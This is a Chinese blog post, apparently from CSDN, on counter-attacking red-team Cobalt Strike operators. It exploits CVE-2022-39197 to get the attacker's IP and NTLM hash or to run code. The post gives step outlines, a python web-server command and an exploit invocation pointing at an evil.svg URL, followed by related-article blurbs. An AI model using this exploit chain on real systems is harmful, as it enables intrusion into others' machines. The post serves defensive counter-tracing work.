溯源反制-远程控制工具-CobaltStrike

已于 2023-04-25 16:52:43 修改
阅读量593 收藏 2
点赞数
分类专栏: 溯源反制 文章标签: 系统安全
于 2023-04-25 16:50:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62172162/article/details/130368677
版权

复现环境:
蓝队:47.106.xxx.xxx
红队:8.130.xxx.xxx
对抗Cobaltstrike中的手段:
1、伪造流量批量上线(欺骗防御)
https://mp.weixin.qq.com/s/VCRg6F9Wq-yg-qajDoJuaw
2、利用漏洞(CVE-2022-39197)
Cobalt Strike <=4.7 XSS
• 获取真实ip地址
• 获取NTLM
• RCE
• SSRF
https://github.com/its-arun/CVE-2022-39197
取得红队木马样本开始操作如下:


修改后打包,jar包如下:


-蓝队修改EXP里面的执行命令后编译(红队客户端触发的东西在这里修改)
修改:EvilJar/src/main/java/Exploit.java
-蓝队修改svg加载地址并架设Web服务(红队的CS服务器能访问的Web服务)


修改:evil.svg 指向url地址 


python3 -m http.server 7777
目的是调用svg文件
-蓝队执行EXP调用后门上线,攻击者进程查看时触发
python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.svg

加油上分版
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反击CobaltStrike
HBohan的博客
09-03 1313
背景 CobaltStrike(简称CS)作为一款渗透测试神器,采用C/S架构,可进行分布式团队协作。CS集成了端口转发、服务扫描、自动化溢出、多模式端口监听、Windows exe与dll 木马生、Java 木马生成、Office 宏病毒生成、木马捆绑等强大功能,深受广大红队同学的喜爱。为了规避侦测,红队往往会对CS采用一些隐匿手段,常见方式有云函数和CDN等。这些隐匿手段隐匿了CS的真实IP,诸如DDoS之类的流量无法穿透CDN到达CS,常规的攻击方式难以对CS服务器形成有效干扰和打击。只能止步于此了吗
Cobaltstrike系列(一)-- 远程控制
weixin_41489908的博客
02-07 3486
前天和爸爸在晒太阳,爸爸突然说了句:感觉怎么样,社会不好闯吧,如果太累的话就缓缓,老子给你撑一下。听到这里的时候我突然就嚎啕大哭了,想起自己这些年来,再看看父亲头上的白发,我突然发现自己还不够拼。。。 一、通过cmd窗口运行teamserver,后面加上目标ip 用户名 二、双击运行cobaltstrike.bat 三、输入用户名和密码登录 四、设置监听器,点击菜单栏cobalt strik...
探索 Awesome CobaltStrike:攻防演练与红蓝对抗的利器
最新发布
gitblog_00033的博客
03-21 330
探索 Awesome CobaltStrike:攻防演练与红蓝对抗的利器 项目地址:https://gitcode.com/zer0yu/Awesome-CobaltStrike Awesome CobaltStrike 是一个精心整理的资源集合,旨在帮助网络安全专业人员深入理解和应用 Cobalt Strike 这一著名的渗透测试工具。本文将解析该项目的核心价值,技术要点,并探讨其在实战中的应用...
20210215 Cobalt Strike 重定器/转发器/红队反溯源手段
qq_45290991的博客
02-15 799
Hello,大家好哇,我们上一节讲了Cobalt Strike Beacon的一些基础知识,但是好像喜欢看的小伙伴不是很多呀,是不是太枯燥呢?但是我觉得我们在渗透过程中也要做到知其然、知其所以然。所以,如果之前章节没看的小伙伴们可以点击下方图片阅读。 在真实的攻击环境中我们可能并不希望暴露自己的团队服务器,所以我们可以在Team Server前增加几个重定向器以隐藏自己的真实地址,拓扑图如下:其实这个重定向器的作用就是端口转发,但它有两个重要的功能:1. 保护你team server的真实IP2. 提供了冗
CobaltStrike 重定向器IP防溯源
LuckySec
12-09 3084
0x01 重定向器 重定向器是位于你的目标网络和你的团队服务器之间的系统。任何去往重定向器的连接将转发到你的团队服务器进行处理。通过重定向器,可以为你的 Beacon payload 提供多个回连主机。使用重定向器有助于提升行为安全,因为它会使溯源团队服务器的真实地址变得更加困难。 C2 Redirectors,就是在现有的C2上增加一个中转服务器,这个中转服务器起到功能和流量分离的作用,C2流量可以被中转到不同战术意义的服务器,比如打完就走的短期C2、需要长期控制驻留的C2和邮件钓鱼服务器等。 这个 C
cobaltstrike3.8服务器搭建及使用
weixin_33881753的博客
10-31 1101
参考链接: https://www.ezreal.net/archives/166.htmlhttp://blog.cobaltstrike.com/category/cobalt-strike-2/ cobaltstrike作者博客https://wujunze.com/wooyun/drops/Cobalt%20Strike%20之团队服务器的搭建与DNS通讯演示.html   ...
2021HW溯源反制终极手册.zip
04-27
溯源反制思想; 威慑反制能力建设; 红蓝对抗中的溯源反制实战; 溯源反制战术讲解; APT攻击检测与反制技术体系; 溯源反制中常见技术; 红蓝对抗中的溯源反制实战案例讲解; 溯源反制产品; 蜜罐诱捕市场指南; ...
溯源取证-流量分析 中级难度的资源
05-30
溯源取证-流量分析 中级难度的资源
142-溯源反制之MySQL蜜罐研究.pdf
09-20
142-溯源反制之MySQL蜜罐研究.pdf
红蓝对抗中的溯源反制实战.pdf
03-12
红蓝对抗中的溯源反制实战.pdf
2021HW参考 _ 溯源反制终极手册(精选版).pdf
03-30
适合于2021参加hw的人。
利用Cobalt Strike通过exe木马实现远控|Cobalt Strike远程控制|Cobalt Strike 使用方法|CS使用方法
VI___
02-29 1万+
一、下载“CS-闪电攻击” 百度网盘:https://pan.baidu.com/s/1nXq58froWt0mu3q8I4HsSQ,提取码:fdvb CS分为两部分:客户端、服务端,CS 依赖 Java 1.8,所以运行CS程序前自行安装java,windows 和 kali 都装上吧,kali自带的openjdk也能用。 二、攻击 1、将cobalt Strike复制到 ...
【远控使用】Cobalt Strike横向渗透域控
孤桜懶契
09-11 2091
categories: 知识积累 top: FALSE copyright: true abbrlink: 1643719980 #date: '2021-8-7 12:00:00' #description:1400x780 tags: 内网渗透 提权 渗透测试 黑客工具photos: https://gitee.com/gylq/cloudimages/raw/master/img/image-20210826182104275.png 前言 Cobalt Strike.
CobaltStrike4.0 远控分析
mai1zhi2的博客
12-25 1171
1. 概述 Cobalt Strike是渗透测试神器,其功能简介就不用多说了,其4.0版本更新已有一段时间了,这里献丑分析一下,若有错误的地方望大伙指出,谢谢。 2. 样本信息 样本名 artifact4.exe 样本大小 14,336 字节 MD5 9ff9170e001f5619a0be11516051f538 SHA1 b824ed85d7dbe14f193f70d328d061e90c760736 3. 实验环境...
BadUSB超详细制作, 实现CobaltStrike远控上线
xf555er的博客
12-11 2286
BadUSB是利用了USB协议上的漏洞,通过更改USB的内部固件,在正常的USB接口接入后,模拟外置鼠标、键盘的功能,以此来使目标主机执行已经精心构造好的命令。在此过程中不会引起杀毒软件、防火墙的一丝怀疑。而且因为是在固件级别的应用,U盘格式化根本无法阻止其内部代码的执行。
cobalt strike部署在云服务器上远程攻击
m0_64987233的博客
07-05 596
2.cobalt strike使用。
一次偶然的CobaltStrike木马钓鱼邮件分析
博客地址 www.sec0nd.top
08-02 2060
前几天看到一篇关于近期钓鱼邮件的情况统计的文章,挺有意思然后在逛某威胁感知社区的时候,看到了一个恶意url,也挺有意思子域名伪装成某安全公司hhh,然后看了下与之有关的通信样本好家伙全是钓鱼文件,免杀做的还不错,最近几天不知道为什么异常频繁于是就点进去几个看了看,分析分析这种是怎么实现cs上线的(纯小白,勿喷) 下面所有分析均为在线沙箱进行测试的结果。......
Cobalt Strike入门教程-通过exe木马实现远控
weixin_30770495的博客
05-18 5010
Cobalt Strike(简称CS)有很多功能,这篇文章主要介绍最基本的功能:通过exe木马实现远程控制。 CS分为两部分:客户端和Team Server服务端。这两部分都依赖Java 1.8,所以运行CS程序前要安装JRE。 分享一个Cobalt Strike v3.8的试用版,可长期试用。百度网盘:https://pan.baidu.com/s/1nXq58froWt0mu3q8I4Hs...
工具使用 | CobaltStrike上线Linux主机(CrossC2)
热门推荐
Ms08067安全实验室
07-04 1万+
CobaltStrike上线Linux主机(CrossC2)写在前面在红蓝对抗中,我们经常会碰到需要对Linux主机进行长期远控的情况。对于Windows主机,我们可以使用CobaltS...
利用蜜罐怎么进行溯源反制
07-14
利用蜜罐进行溯源反制是一种追踪攻击者并采取相应措施的方法。以下是一些常见的步骤和技术: 1. 日志记录:蜜罐系统应该详细记录所有与其交互的攻击行为,包括攻击者的IP地址、使用的工具和技术、攻击流量等。这些...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值